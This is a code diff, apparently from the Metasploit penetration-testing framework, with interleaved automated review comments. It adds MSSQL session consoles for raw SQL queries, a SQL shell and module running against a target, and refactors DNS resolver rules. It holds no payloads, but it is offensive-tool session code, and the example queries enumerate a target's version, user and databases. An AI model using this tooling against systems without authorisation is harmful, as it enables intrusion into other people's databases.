@@ -0,0 +1,147 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'pathname'
|
||||
require 'reline'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# Core MSSQL client commands
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Client
|
||||
|
||||
include Rex::Post::MSSQL::Ui::Console::CommandDispatcher
|
||||
|
||||
#
|
||||
# Initializes an instance of the core command set using the supplied console
|
||||
# for interactivity.
|
||||
#
|
||||
# @param [Rex::Post::MSSQL::Ui::Console] console
|
||||
def initialize(console)
|
||||
super
|
||||
|
||||
@db_search_results = []
|
||||
end
|
||||
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
# @return [Hash{String->String}]
|
||||
def commands
|
||||
cmds = {
|
||||
'query' => 'Run a raw SQL query',
|
||||
'shell' => 'Enter a raw shell where SQL queries can be executed',
|
||||
}
|
||||
|
||||
reqs = {}
|
||||
|
||||
filter_commands(cmds, reqs)
|
||||
end
|
||||
|
||||
# @return [String]
|
||||
def name
|
||||
'MSSQL Client'
|
||||
end
|
||||
|
||||
# @param [Object] args
|
||||
# @return [FalseClass, TrueClass]
|
||||
def help_args?(args)
|
||||
return false unless args.instance_of?(::Array)
|
||||
|
||||
args.include?('-h') || args.include?('--help')
|
||||
end
|
||||
|
||||
# @return [Object]
|
||||
def cmd_shell_help
|
||||
print_line 'Usage: shell'
|
||||
print_line
|
||||
print_line 'Go into a raw SQL shell where SQL queries can be executed.'
|
||||
print_line 'To exit, type `exit`, `quit`, `end` or `stop`.'
|
||||
print_line
|
||||
end
|
||||
|
||||
# @param [Array] args
|
||||
# @return [Object]
|
||||
def cmd_shell(*args)
|
||||
cmd_shell_help && return if help_args?(args)
|
||||
|
||||
prompt_proc_before = ::Reline.prompt_proc
|
||||
|
||||
::Reline.prompt_proc = proc { |line_buffer| line_buffer.each_with_index.map { |_line, i| i > 0 ? 'SQL *> ' : 'SQL >> ' } }
|
||||
|
||||
stop_words = %w[stop s exit e end quit q].freeze
|
||||
|
||||
finished = false
|
||||
loop do
|
||||
begin
|
||||
raw_query = ::Reline.readmultiline('SQL >> ', use_history = true) do |multiline_input|
|
||||
finished = stop_words.include?(multiline_input.split.last)
|
||||
finished || (multiline_input.split.last && !multiline_input.split.last.end_with?('\\'))
|
||||
end
|
||||
rescue ::Interrupt
|
||||
finished = true
|
||||
ensure
|
||||
::Reline.prompt_proc = prompt_proc_before
|
||||
end
|
||||
|
||||
if finished
|
||||
print_status 'Exiting Shell mode.'
|
||||
return
|
||||
end
|
||||
|
||||
formatted_query = raw_query.split.map { |word| word.chomp('\\') }.reject(&:empty?).compact.join(' ')
|
||||
|
||||
print_status "Running SQL Command: '#{formatted_query}'"
|
||||
cmd_query(formatted_query)
|
||||
end
|
||||
end
|
||||
|
||||
# @return [Object]
|
||||
def cmd_query_help
|
||||
print_line 'Usage: query'
|
||||
print_line
|
||||
print_line 'Run a raw SQL query on the target.'
|
||||
print_line 'Examples:'
|
||||
print_line
|
||||
print_line ' query select @@version;'
|
||||
print_line ' query select user_name();'
|
||||
print_line ' query select name from master.dbo.sysdatabases;'
|
||||
print_line
|
||||
end
|
||||
|
||||
# @param [Array] result The result of an SQL query to format.
|
||||
def format_result(result)
|
||||
columns = ['#']
|
||||
|
||||
unless result.is_a?(Array)
|
||||
result.fields.each { |field| columns.append(field.name) }
|
||||
|
||||
::Rex::Text::Table.new(
|
||||
'Header' => 'Query Result',
|
||||
'Indent' => 4,
|
||||
'Columns' => columns,
|
||||
'Rows' => result.map.each.with_index { |row, i| [i, row].flatten }
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
# @param [Array] args SQL query
|
||||
# @return [Object]
|
||||
def cmd_query(*args)
|
||||
if help_args?(args)
|
||||
cmd_query_help
|
||||
return
|
||||
end
|
||||
|
||||
query = args.join(' ').to_s
|
||||
client.mssql_query(query, true) || []
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
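Review bot: In `cmd_shell`, `cmd_shell_help && return` returns only when the final `print_line` in `cmd_shell_help` yields a truthy value; if it returns nil, `shell -h` falls through into the interactive loop, so the explicit form used in `cmd_query` (call the help method, then a bare `return`) is safer. The `ensure` inside the loop restores `Reline.prompt_proc` after the first read, so later iterations run without the `SQL *> ` continuation prompt; wrapping the whole loop in one `begin … ensure` would restore it once on exit. `raw_query` is used in `raw_query.split` without a nil check, and end-of-input from `readmultiline` presumably returns nil. Rebuilding the statement with `split … join(' ')` also collapses runs of whitespace inside quoted SQL literals, which changes the data sent. `format_result` returns nil for an Array argument and is not called in this file, and `use_history = true` assigns a stray local rather than naming a parameter.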
|
||||
@@ -0,0 +1,61 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/post/mssql'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# Core MSSQL client commands
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Core
|
||||
|
||||
include Rex::Post::MSSQL::Ui::Console::CommandDispatcher
|
||||
|
||||
#
|
||||
# Initializes an instance of the core command set using the supplied session and client
|
||||
# for interactivity.
|
||||
#
|
||||
# @param [Rex::Post::MSSQL::Ui::Console] console
|
||||
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
def commands
|
||||
cmds = {
|
||||
'?' => 'Help menu',
|
||||
'background' => 'Backgrounds the current session',
|
||||
'bg' => 'Alias for background',
|
||||
'exit' => 'Terminate the MSSQL session',
|
||||
'help' => 'Help menu',
|
||||
'irb' => 'Open an interactive Ruby shell on the current session',
|
||||
'pry' => 'Open the Pry debugger on the current session',
|
||||
'sessions' => 'Quickly switch to another session'
|
||||
}
|
||||
|
||||
reqs = {}
|
||||
|
||||
filter_commands(cmds, reqs)
|
||||
end
|
||||
|
||||
#
|
||||
# Core
|
||||
#
|
||||
def name
|
||||
'Core'
|
||||
end
|
||||
|
||||
def unknown_command(cmd, line)
|
||||
status = super
|
||||
|
||||
status
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
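Review bot: The `unknown_command` override only stores `super` in `status` and returns it, so it behaves exactly like the inherited method and can be removed. The doc comment beginning `Initializes an instance of the core command set` with its `@param console` is not followed by any `initialize`, so it documents nothing; either drop it or restore the method it was written for. The class header `Core MSSQL client commands` would be clearer as a description of the session-management commands this dispatcher actually lists (`background`, `exit`, `irb`, `pry`, `sessions`).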
|
||||
@@ -0,0 +1,95 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'pathname'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# MSSQL client commands for running modules
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Modules
|
||||
|
||||
include Rex::Post::MSSQL::Ui::Console::CommandDispatcher
|
||||
|
||||
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
def commands
|
||||
cmds = {
|
||||
'run' => 'Run a module'
|
||||
}
|
||||
|
||||
reqs = {}
|
||||
|
||||
filter_commands(cmds, reqs)
|
||||
end
|
||||
|
||||
#
|
||||
# Modules
|
||||
#
|
||||
def name
|
||||
'Modules'
|
||||
end
|
||||
|
||||
def cmd_run_help
|
||||
print_line 'Usage: Modules'
|
||||
print_line
|
||||
print_line 'Run a module.'
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Executes a module/script in the context of the mssql session.
|
||||
#
|
||||
def cmd_run(*args)
|
||||
if args.empty? || args.first == '-h' || args.first == '--help'
|
||||
cmd_run_help
|
||||
return true
|
||||
end
|
||||
|
||||
# Get the script name
|
||||
begin
|
||||
script_name = args.shift
|
||||
# First try it as a module if we have access to the Metasploit
|
||||
# Framework instance. If we don't, or if no such module exists,
|
||||
# fall back to using the scripting interface.
|
||||
if msf_loaded? && (mod = session.framework.modules.create(script_name))
|
||||
original_mod = mod
|
||||
reloaded_mod = session.framework.modules.reload_module(original_mod)
|
||||
|
||||
unless reloaded_mod
|
||||
error = session.framework.modules.module_load_error_by_path[original_mod.file_path]
|
||||
print_error("Failed to reload module: #{error}")
|
||||
|
||||
return
|
||||
end
|
||||
|
||||
opts = ''
|
||||
|
||||
opts << (args + [ "SESSION=#{session.sid}" ]).join(',')
|
||||
result = reloaded_mod.run_simple(
|
||||
'LocalInput' => shell.input,
|
||||
'LocalOutput' => shell.output,
|
||||
'OptionStr' => opts
|
||||
)
|
||||
|
||||
print_status("Session #{result.sid} created in the background.") if result.is_a?(Msf::Session)
|
||||
else
|
||||
# the rest of the arguments get passed in through the binding
|
||||
session.execute_script(script_name, args)
|
||||
end
|
||||
rescue StandardError => e
|
||||
print_error("Error in script: #{script_name}")
|
||||
elog("Error in script: #{script_name}", error: e)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
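Review bot: The `rescue StandardError` in `cmd_run` shows the operator only `Error in script: <name>` and sends the exception itself to `elog`, so a failed module run gives no visible reason; `print_error("Error in script: #{script_name}: #{e.class} #{e}")` would surface it. `cmd_run_help` prints `Usage: Modules` rather than the command syntax, for example `Usage: run <module> [OPTION=value ...]`. The options are joined with `,` into `OptionStr`, so an argument whose value contains a comma would presumably be split into separate options; this depends on how `run_simple` parses the string and deserves a comment or a test. The method also returns `true` on the help path and nil on the reload-failure path, which a `@return` tag could settle.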
|
||||
@@ -23,8 +23,8 @@ module Rex
|
||||
# The mysql client context
|
||||
self.session = session
|
||||
self.client = session.client
|
||||
self.cwd = client.database
|
||||
prompt = "%undMySQL @ #{client.socket.peerinfo} (#{cwd})%clr"
|
||||
self.client.socket ||= self.client.io
|
||||
prompt = "%undMySQL @ #{client.socket.peerinfo} (#{database_name})%clr"
|
||||
history_manager = Msf::Config.mysql_session_history
|
||||
super(prompt, '>', history_manager, nil, :mysql)
|
||||
|
||||
@@ -119,13 +119,14 @@ module Rex
|
||||
attr_reader :client
|
||||
|
||||
# @return [String]
|
||||
attr_accessor :cwd
|
||||
def database_name
|
||||
client.database
|
||||
end
|
||||
|
||||
# @param [Object] val
|
||||
# @return [String]
|
||||
def format_prompt(val)
|
||||
@cwd ||= client.database
|
||||
prompt = "%undMySQL @ #{client.socket.peerinfo} (#{@cwd})%clr > "
|
||||
prompt = "%undMySQL @ #{client.socket.peerinfo} (#{database_name})%clr > "
|
||||
substitute_colors(prompt, true)
|
||||
end
|
||||
|
||||
|
||||
@@ -30,8 +30,7 @@ module Rex
|
||||
# The postgresql client context
|
||||
self.session = session
|
||||
self.client = session.client
|
||||
self.cwd = client.params['database']
|
||||
prompt = "%undPostgreSQL @ #{client.conn.peerinfo} (#{cwd})%clr"
|
||||
prompt = "%undPostgreSQL @ #{client.conn.peerinfo} (#{database_name})%clr"
|
||||
history_manager = Msf::Config.postgresql_session_history
|
||||
super(prompt, '>', history_manager, nil, :postgresql)
|
||||
|
||||
@@ -136,11 +135,12 @@ module Rex
|
||||
attr_reader :client # :nodoc:
|
||||
|
||||
# @return [String]
|
||||
attr_accessor :cwd
|
||||
def database_name
|
||||
client.params['database']
|
||||
end
|
||||
|
||||
def format_prompt(val)
|
||||
cwd ||= client.params['database']
|
||||
prompt = "%undPostgreSQL @ #{client.conn.peerinfo} (#{cwd})%clr > "
|
||||
prompt = "%undPostgreSQL @ #{client.conn.peerinfo} (#{database_name})%clr > "
|
||||
substitute_colors(prompt, true)
|
||||
end
|
||||
|
||||
|
||||
@@ -55,6 +55,7 @@ module Rex
|
||||
cmds = {
|
||||
'shares' => 'View the available shares and interact with one',
|
||||
'ls' => 'List all files in the current directory',
|
||||
'dir' => 'List all files in the current directory (alias for ls)',
|
||||
'pwd' => 'Print the current remote working directory',
|
||||
'cd' => 'Change the current remote working directory',
|
||||
'cat' => 'Read the file at the given path'
|
||||
@@ -181,12 +182,31 @@ module Rex
|
||||
print_line table.to_s
|
||||
end
|
||||
|
||||
def cmd_ls_help
|
||||
print_line 'Usage:'
|
||||
print_line 'ls [options] [path]'
|
||||
print_line
|
||||
print_line 'COMMAND ALIASES:'
|
||||
print_line
|
||||
print_line ' dir'
|
||||
print_line
|
||||
print_line 'Lists contents of directory or file info'
|
||||
print_line @@ls_opts.usage
|
||||
end
|
||||
|
||||
def cmd_ls_tabs(_str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
@@ls_opts.option_keys
|
||||
end
|
||||
|
||||
#
|
||||
# Alias the ls command to dir, for those of us who have windows muscle-memory
|
||||
#
|
||||
alias cmd_dir cmd_ls
|
||||
alias cmd_dir_help cmd_ls_help
|
||||
alias cmd_dir_tabs cmd_ls_tabs
|
||||
|
||||
def cmd_pwd_help
|
||||
print_line 'Usage: pwd'
|
||||
print_line
|
||||
|
||||
@@ -57,22 +57,11 @@ module DNS
|
||||
end
|
||||
|
||||
#
|
||||
# Add static record to cache
|
||||
# Delete all cache entries, this is different from pruning because the
|
||||
# record's expiration is ignored
|
||||
#
|
||||
# @param name [String] Name of record
|
||||
# @param address [String] Address of record
|
||||
# @param type [Dnsruby::Types] Record type to add
|
||||
# @param replace [TrueClass, FalseClass] Replace existing records
|
||||
def add_static(name, address, type = Dnsruby::Types::A, replace = false)
|
||||
if Rex::Socket.is_ip_addr?(address.to_s) and
|
||||
( name.to_s.match(MATCH_HOSTNAME) or name == '*')
|
||||
find(name, type).each do |found|
|
||||
delete(found)
|
||||
end if replace
|
||||
add(Dnsruby::RR.create(name: name, type: type, address: address),0)
|
||||
else
|
||||
raise "Invalid parameters for static entry - #{name}, #{address}, #{type}"
|
||||
end
|
||||
def flush
|
||||
self.records.each {|rec, _| delete(rec)}
|
||||
end
|
||||
|
||||
#
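Review bot: `flush` calls `delete(rec)` while iterating `self.records`; whether that is safe depends on what `records` returns and on the cache's background thread, neither of which is visible in this hunk. Iterating over a snapshot, `self.records.to_a.each { |rec, _| delete(rec) }`, removes the dependency on the live collection. The comment could also state whether `flush` is expected to be called while the cache's monitor thread is running and whether callers must hold a lock.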
|
||||
|
||||
@@ -24,55 +24,6 @@ module DNS
|
||||
dns_cache_no_start = config.delete(:dns_cache_no_start)
|
||||
super(config)
|
||||
self.cache = Rex::Proto::DNS::Cache.new
|
||||
# Read hostsfile into cache
|
||||
hf = Rex::Compat.is_windows ? '%WINDIR%/system32/drivers/etc/hosts' : '/etc/hosts'
|
||||
entries = begin
|
||||
File.read(hf).lines.map(&:strip).select do |entry|
|
||||
Rex::Socket.is_ip_addr?(entry.gsub(/\s+/,' ').split(' ').first) and
|
||||
not entry.match(/::.*ip6-/) # Ignore Debian/Ubuntu-specific notation for IPv6 hosts
|
||||
end.map do |entry|
|
||||
entry.gsub(/\s+/,' ').split(' ')
|
||||
end
|
||||
rescue => e
|
||||
@logger.error(e)
|
||||
[]
|
||||
end
|
||||
entries.each do |ent|
|
||||
next if ent.first =~ /^127\./
|
||||
# Deal with multiple hostnames per address
|
||||
while ent.length > 2
|
||||
hostname = ent.pop
|
||||
next unless MATCH_HOSTNAME.match hostname
|
||||
begin
|
||||
if Rex::Socket.is_ipv4?(ent.first)
|
||||
self.cache.add_static(hostname, ent.first, Dnsruby::Types::A)
|
||||
elsif Rex::Socket.is_ipv6?(ent.first)
|
||||
self.cache.add_static(hostname, ent.first, Dnsruby::Types::AAAA)
|
||||
else
|
||||
raise "Unknown IP address format #{ent.first} in hosts file!"
|
||||
end
|
||||
rescue => e
|
||||
# Deal with edge-cases in users' hostsfile
|
||||
@logger.error(e)
|
||||
end
|
||||
end
|
||||
hostname = ent.pop
|
||||
begin
|
||||
if MATCH_HOSTNAME.match hostname
|
||||
if Rex::Socket.is_ipv4?(ent.first)
|
||||
self.cache.add_static(hostname, ent.first, Dnsruby::Types::A)
|
||||
elsif Rex::Socket.is_ipv6?(ent.first)
|
||||
self.cache.add_static(hostname, ent.first, Dnsruby::Types::AAAA)
|
||||
else
|
||||
raise "Unknown IP address format #{ent.first} in hosts file!"
|
||||
end
|
||||
end
|
||||
rescue => e
|
||||
# Deal with edge-cases in users' hostsfile
|
||||
@logger.error(e)
|
||||
end
|
||||
end
|
||||
# TODO: inotify or similar on hostsfile for live updates? Easy-button functionality
|
||||
self.cache.start unless dns_cache_no_start
|
||||
return
|
||||
end
|
||||
|
||||
@@ -1,3 +1,5 @@
|
||||
require 'rex/proto/dns/upstream_resolver'
|
||||
|
||||
module Rex
|
||||
module Proto
|
||||
module DNS
|
||||
@@ -7,11 +9,12 @@ module DNS
|
||||
# for different requests, based on the domain being queried.
|
||||
##
|
||||
module CustomNameserverProvider
|
||||
CONFIG_KEY = 'framework/dns'
|
||||
CONFIG_KEY_BASE = 'framework/dns'
|
||||
CONFIG_VERSION = Rex::Version.new('1.0')
|
||||
|
||||
#
|
||||
# A Comm implementation that always reports as dead, so should never
|
||||
# be used. This is used to prevent DNS leaks of saved DNS rules that
|
||||
# be used. This is used to prevent DNS leaks of saved DNS rules that
|
||||
# were attached to a specific channel.
|
||||
##
|
||||
class CommSink
|
||||
@@ -31,128 +34,120 @@ module DNS
|
||||
end
|
||||
|
||||
def init
|
||||
self.entries_with_rules = []
|
||||
self.entries_without_rules = []
|
||||
self.next_id = 0
|
||||
@upstream_rules = []
|
||||
|
||||
resolvers = [UpstreamResolver.create_static]
|
||||
if @config[:nameservers].empty?
|
||||
# if no nameservers are specified, fallback to the system
|
||||
resolvers << UpstreamResolver.create_system
|
||||
else
|
||||
# migrate the originally configured name servers
|
||||
resolvers += @config[:nameservers].map(&:to_s)
|
||||
@config[:nameservers].clear
|
||||
end
|
||||
|
||||
add_upstream_rule(resolvers)
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
# Reinitialize the configuration to its original state.
|
||||
def reinit
|
||||
parse_config_file
|
||||
parse_environment_variables
|
||||
|
||||
self.static_hostnames.flush
|
||||
self.static_hostnames.parse_hosts_file
|
||||
|
||||
init
|
||||
|
||||
cache.flush if respond_to?(:cache)
|
||||
|
||||
nil
|
||||
end
|
||||
|
||||
# Check whether or not there is configuration data in Metasploit's configuration file which is persisted on disk.
|
||||
def has_config?
|
||||
config = Msf::Config.load
|
||||
version = config.fetch(CONFIG_KEY_BASE, {}).fetch('configuration_version', nil)
|
||||
if version.nil?
|
||||
@logger.info 'DNS configuration can not be loaded because the version is missing'
|
||||
return false
|
||||
end
|
||||
|
||||
their_version = Rex::Version.new(version)
|
||||
if their_version > CONFIG_VERSION # if the config is newer, it's incompatible (we only guarantee backwards compat)
|
||||
@logger.info "DNS configuration version #{their_version} can not be loaded because it is too new"
|
||||
return false
|
||||
end
|
||||
|
||||
my_minimum_version = Rex::Version.new(CONFIG_VERSION.canonical_segments.first.to_s)
|
||||
if their_version < my_minimum_version # can not be older than our major version
|
||||
@logger.info "DNS configuration version #{their_version} can not be loaded because it is too old"
|
||||
return false
|
||||
end
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
#
|
||||
# Save the custom settings to the MSF config file
|
||||
#
|
||||
def save_config
|
||||
new_config = {}
|
||||
[self.entries_with_rules, self.entries_without_rules].each do |entry_set|
|
||||
entry_set.each do |entry|
|
||||
key = entry[:id].to_s
|
||||
val = [entry[:wildcard_rules].join(','),
|
||||
entry[:dns_server],
|
||||
(!entry[:comm].nil?).to_s
|
||||
].join(';')
|
||||
new_config[key] = val
|
||||
end
|
||||
end
|
||||
new_config = {
|
||||
'configuration_version' => CONFIG_VERSION.to_s
|
||||
}
|
||||
Msf::Config.save(CONFIG_KEY_BASE => new_config)
|
||||
|
||||
Msf::Config.save(CONFIG_KEY => new_config)
|
||||
save_config_upstream_rules
|
||||
save_config_static_hostnames
|
||||
end
|
||||
|
||||
#
|
||||
# Load the custom settings from the MSF config file
|
||||
#
|
||||
def load_config
|
||||
config = Msf::Config.load
|
||||
|
||||
with_rules = []
|
||||
without_rules = []
|
||||
next_id = 0
|
||||
|
||||
dns_settings = config.fetch(CONFIG_KEY, {}).each do |name, value|
|
||||
id = name.to_i
|
||||
wildcard_rules, dns_server, uses_comm = value.split(';')
|
||||
wildcard_rules = wildcard_rules.split(',')
|
||||
|
||||
raise Msf::Config::ConfigError.new('DNS parsing failed: Comm must be true or false') unless ['true','false'].include?(uses_comm)
|
||||
raise Msf::Config::ConfigError.new('Invalid DNS config: Invalid DNS server') unless Rex::Socket.is_ip_addr?(dns_server)
|
||||
raise Msf::Config::ConfigError.new('Invalid DNS config: Invalid rule') unless wildcard_rules.all? {|rule| valid_rule?(rule)}
|
||||
|
||||
comm = uses_comm == 'true' ? CommSink.new : nil
|
||||
entry = {
|
||||
:wildcard_rules => wildcard_rules,
|
||||
:dns_server => dns_server,
|
||||
:comm => comm,
|
||||
:id => id
|
||||
}
|
||||
|
||||
if wildcard_rules.empty?
|
||||
without_rules << entry
|
||||
else
|
||||
with_rules << entry
|
||||
end
|
||||
|
||||
next_id = [id + 1, next_id].max
|
||||
unless has_config?
|
||||
raise ResolverError.new('There is no compatible configuration data to load')
|
||||
end
|
||||
|
||||
# Now that config has successfully read, update the global values
|
||||
self.entries_with_rules = with_rules
|
||||
self.entries_without_rules = without_rules
|
||||
self.next_id = next_id
|
||||
load_config_entries
|
||||
load_config_static_hostnames
|
||||
end
|
||||
|
||||
# Add a custom nameserver entry to the custom provider
|
||||
# @param wildcard_rules [Array<String>] The wildcard rules to match a DNS request against
|
||||
# @param dns_server [Array<String>] The list of IP addresses that would be used for this custom rule
|
||||
# @param comm [Msf::Session::Comm] The communication channel to be used for these DNS requests
|
||||
def add_nameserver(wildcard_rules, dns_server, comm)
|
||||
raise ::ArgumentError.new("Invalid DNS server: #{dns_server}") unless Rex::Socket.is_ip_addr?(dns_server)
|
||||
wildcard_rules.each do |rule|
|
||||
raise ::ArgumentError.new("Invalid rule: #{rule}") unless valid_rule?(rule)
|
||||
end
|
||||
# Add a custom nameserver entry to the custom provider.
|
||||
#
|
||||
# @param [Array<String>] resolvers The list of upstream resolvers that would be used for this custom rule.
|
||||
# @param [Msf::Session::Comm] comm The communication channel to be used for these DNS requests.
|
||||
# @param [String] wildcard The wildcard rule to match a DNS request against.
|
||||
# @param [Integer] index The index at which to insert the rule, defaults to -1 to append it at the end.
|
||||
def add_upstream_rule(resolvers, comm: nil, wildcard: '*', index: -1)
|
||||
resolvers = [resolvers] if resolvers.is_a?(String) # coerce into an array of strings
|
||||
|
||||
entry = {
|
||||
:wildcard_rules => wildcard_rules,
|
||||
:dns_server => dns_server,
|
||||
:comm => comm,
|
||||
:id => self.next_id
|
||||
}
|
||||
self.next_id += 1
|
||||
if wildcard_rules.empty?
|
||||
entries_without_rules << entry
|
||||
else
|
||||
entries_with_rules << entry
|
||||
end
|
||||
@upstream_rules.insert(index, UpstreamRule.new(
|
||||
wildcard: wildcard,
|
||||
resolvers: resolvers,
|
||||
comm: comm
|
||||
))
|
||||
end
|
||||
|
||||
#
|
||||
# Remove entries with the given IDs
|
||||
# Remove upstream rules with the given indexes
|
||||
# Ignore entries that are not found
|
||||
# @param ids [Array<Integer>] The IDs to removed
|
||||
# @return [Array<Hash>] The removed entries
|
||||
#
|
||||
# @return [Array<UpstreamRule>] The removed entries
|
||||
def remove_ids(ids)
|
||||
removed= []
|
||||
ids.each do |id|
|
||||
removed_with, remaining_with = self.entries_with_rules.partition {|entry| entry[:id] == id}
|
||||
self.entries_with_rules.replace(remaining_with)
|
||||
|
||||
removed_without, remaining_without = self.entries_without_rules.partition {|entry| entry[:id] == id}
|
||||
self.entries_without_rules.replace(remaining_without)
|
||||
|
||||
removed.concat(removed_with)
|
||||
removed.concat(removed_without)
|
||||
removed = []
|
||||
ids.sort.reverse.each do |id|
|
||||
upstream_rule = @upstream_rules.delete_at(id)
|
||||
removed << upstream_rule if upstream_rule
|
||||
end
|
||||
|
||||
removed
|
||||
removed.reverse
|
||||
end
|
||||
|
||||
#
|
||||
# The custom nameserver entries that have been configured
|
||||
# @return [Array<Array>] An array containing two elements: The entries with rules, and the entries without rules
|
||||
#
|
||||
def nameserver_entries
|
||||
[entries_with_rules, entries_without_rules]
|
||||
end
|
||||
|
||||
def purge
|
||||
init
|
||||
def flush
|
||||
@upstream_rules.clear
|
||||
end
|
||||
|
||||
# The nameservers that match the given packet
|
||||
@@ -160,7 +155,7 @@ module DNS
|
||||
# @raise [ResolveError] If the packet contains multiple questions, which would end up sending to a different set of nameservers
|
||||
# @return [Array<Array>] A list of nameservers, each with Rex::Socket options
|
||||
#
|
||||
def nameservers_for_packet(packet)
|
||||
def upstream_resolvers_for_packet(packet)
|
||||
unless feature_set.enabled?(Msf::FeatureManager::DNS_FEATURE)
|
||||
return super
|
||||
end
|
||||
@@ -171,33 +166,15 @@ module DNS
|
||||
results_from_all_questions = []
|
||||
packet.question.each do |question|
|
||||
name = question.qname.to_s
|
||||
dns_servers = []
|
||||
upstream_rule = self.upstream_rules.find { |ur| ur.matches_name?(name) }
|
||||
|
||||
self.entries_with_rules.each do |entry|
|
||||
entry[:wildcard_rules].each do |rule|
|
||||
if matches(name, rule)
|
||||
socket_options = {}
|
||||
socket_options['Comm'] = entry[:comm] unless entry[:comm].nil?
|
||||
dns_servers.append([entry[:dns_server], socket_options])
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Only look at the rule-less entries if no rules were found (avoids DNS leaks)
|
||||
if dns_servers.empty?
|
||||
self.entries_without_rules.each do |entry|
|
||||
socket_options = {}
|
||||
socket_options['Comm'] = entry[:comm] unless entry[:comm].nil?
|
||||
dns_servers.append([entry[:dns_server], socket_options])
|
||||
end
|
||||
end
|
||||
|
||||
if dns_servers.empty?
|
||||
if upstream_rule
|
||||
upstream_resolvers = upstream_rule.resolvers
|
||||
else
|
||||
# Fall back to default nameservers
|
||||
dns_servers = super
|
||||
upstream_resolvers = super
|
||||
end
|
||||
results_from_all_questions << dns_servers.uniq
|
||||
results_from_all_questions << upstream_resolvers.uniq
|
||||
end
|
||||
results_from_all_questions.uniq!
|
||||
if results_from_all_questions.size != 1
|
||||
@@ -215,28 +192,85 @@ module DNS
|
||||
self.feature_set = framework.features
|
||||
end
|
||||
|
||||
private
|
||||
#
|
||||
# Is the given wildcard DNS entry valid?
|
||||
#
|
||||
def valid_rule?(rule)
|
||||
rule =~ /^(\*\.)?([a-z\d][a-z\d-]*[a-z\d]\.)+[a-z]+$/
|
||||
def upstream_rules
|
||||
@upstream_rules.dup
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
def matches(domain, pattern)
|
||||
if pattern.start_with?('*.')
|
||||
domain.downcase.end_with?(pattern[1..-1].downcase)
|
||||
else
|
||||
domain.casecmp?(pattern)
|
||||
def load_config_entries
|
||||
config = Msf::Config.load
|
||||
|
||||
with_rules = []
|
||||
config.fetch("#{CONFIG_KEY_BASE}/entries", {}).each do |_name, value|
|
||||
wildcard, resolvers, uses_comm = value.split(';')
|
||||
wildcard = '*' if wildcard.blank?
|
||||
resolvers = resolvers.split(',')
|
||||
uses_comm.downcase!
|
||||
|
||||
raise Rex::Proto::DNS::Exceptions::ConfigError.new('DNS parsing failed: Comm must be true or false') unless ['true','false'].include?(uses_comm)
|
||||
raise Rex::Proto::DNS::Exceptions::ConfigError.new('Invalid DNS config: Invalid upstream DNS resolver') unless resolvers.all? {|resolver| UpstreamRule.valid_resolver?(resolver) }
|
||||
raise Rex::Proto::DNS::Exceptions::ConfigError.new('Invalid DNS config: Invalid rule') unless UpstreamRule.valid_wildcard?(wildcard)
|
||||
|
||||
comm = uses_comm == 'true' ? CommSink.new : nil
|
||||
with_rules << UpstreamRule.new(
|
||||
wildcard: wildcard,
|
||||
resolvers: resolvers,
|
||||
comm: comm
|
||||
)
|
||||
end
|
||||
|
||||
# Now that config has successfully read, update the global values
|
||||
@upstream_rules = with_rules
|
||||
end
|
||||
|
||||
def load_config_static_hostnames
|
||||
config = Msf::Config.load
|
||||
|
||||
static_hostnames.flush
|
||||
config.fetch("#{CONFIG_KEY_BASE}/static_hostnames", {}).each do |_name, value|
|
||||
hostname, ip_addresses = value.split(';', 2)
|
||||
ip_addresses.split(',').each do |ip_address|
|
||||
next if ip_address.blank?
|
||||
|
||||
unless Rex::Socket.is_ip_addr?(ip_address)
|
||||
raise Rex::Proto::DNS::Exceptions::ConfigError.new('Invalid DNS config: Invalid IP address')
|
||||
end
|
||||
|
||||
static_hostnames.add(hostname, ip_address)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
attr_accessor :entries_with_rules # Set of custom nameserver entries that specify a rule
|
||||
attr_accessor :entries_without_rules # Set of custom nameserver entries that do not include a rule
|
||||
attr_accessor :next_id # The next ID to have been allocated to an entry
|
||||
def save_config_upstream_rules
|
||||
new_config = {}
|
||||
@upstream_rules.each_with_index do |entry, index|
|
||||
val = [
|
||||
entry.wildcard,
|
||||
entry.resolvers.map do |resolver|
|
||||
resolver.type == Rex::Proto::DNS::UpstreamResolver::Type::DNS_SERVER ? resolver.destination : resolver.type.to_s
|
||||
end.join(','),
|
||||
(!entry.comm.nil?).to_s
|
||||
].join(';')
|
||||
new_config["##{index}"] = val
|
||||
end
|
||||
Msf::Config.save("#{CONFIG_KEY_BASE}/upstream_rules" => new_config)
|
||||
end
|
||||
|
||||
def save_config_static_hostnames
|
||||
new_config = {}
|
||||
static_hostnames.each_with_index do |(hostname, addresses), index|
|
||||
val = [
|
||||
hostname,
|
||||
(addresses.fetch(Dnsruby::Types::A, []) + addresses.fetch(Dnsruby::Types::AAAA, [])).join(',')
|
||||
].join(';')
|
||||
new_config["##{index}"] = val
|
||||
end
|
||||
Msf::Config.save("#{CONFIG_KEY_BASE}/static_hostnames" => new_config)
|
||||
end
|
||||
|
||||
attr_accessor :feature_set
|
||||
end
|
||||
end
